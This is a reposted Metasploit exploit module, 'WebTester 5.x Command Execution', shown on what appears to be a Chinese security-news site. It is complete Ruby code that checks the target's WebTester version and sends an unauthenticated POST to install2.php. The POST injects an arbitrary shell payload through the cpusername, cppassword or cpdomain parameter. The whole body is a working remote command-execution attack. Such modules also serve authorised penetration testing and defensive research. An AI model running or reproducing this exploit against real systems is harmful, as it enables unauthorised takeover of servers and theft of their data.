首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WebTester 5.x Command Execution
来源:metasploit.com 作者:Coles 发布时间:2013-10-21  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "WebTester 5.x Command Execution",
      'Description'    => %q{
          This module exploits a command execution vulnerability in WebTester
        version 5.x. The 'install2.php' file allows unauthenticated users to
        execute arbitrary commands in the 'cpusername', 'cppassword' and
        'cpdomain' parameters.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brendan Coles <bcoles[at]gmail.com>'  # Metasploit
        ],
      'References'     =>
        [
          ['URL'       => 'https://sourceforge.net/p/webtesteronline/bugs/3/']
        ],
      'Payload'        =>
        {
            'Space'       => 8190, # Just a big value, injection on POST variable
            'DisableNops' => true,
            'BadChars'   => "\x00"
        },
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
      'Targets'        =>
        [
          # Tested on WebTester v5.1.20101016
          [ 'WebTester version 5.x', { 'auto' => true } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 17 2013',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to WebTester', '/webtester5/'])
        ], self.class)
  end

  #
  # Checks if target is running WebTester version 5.x
  #
  def check
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) })

    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    if res.body =~ /Eppler Software/
      if res.body =~ / - v5\.1\.20101016/
        print_status("#{peer} - Found version: 5.1.20101016")
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ / - v(5\.[\d\.]+)/
        print_status("#{peer} - Found version: #{$1}")
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Detected
      end
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    vuln_params = [
      'cpusername',
      'cppassword',
      'cpdomain'
    ]
    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'install2.php'),
      'vars_post'  => {
        'createdb' => 'yes',
        'cpanel'   => 'yes',
        "#{vuln_params.sample}" => "';#{payload.encoded} #"
      }
    })

    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out")
    elsif res.code == 200 and res.body =~ /Failed to connect to database server/
      print_good("#{peer} - Payload sent successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
    end

  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP Point Of Sale 10.x / 11.x
·FiberHome Modem Router HG-110
·ARRIS DG860A NVRAM Backup Comp
·HP Intelligent Management Cent
·SikaBoom - Remote Buffer Overf
·Interactive Graphical SCADA Sy
·Level One Enterprise Access Po
·D-Link DIR-605L Captcha Handli
·Persistent Payload In Windows
·Windows Management Instrumenta
·Aladdin Knowledge Systems Ltd.
·EMC Replication Manager Comman
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved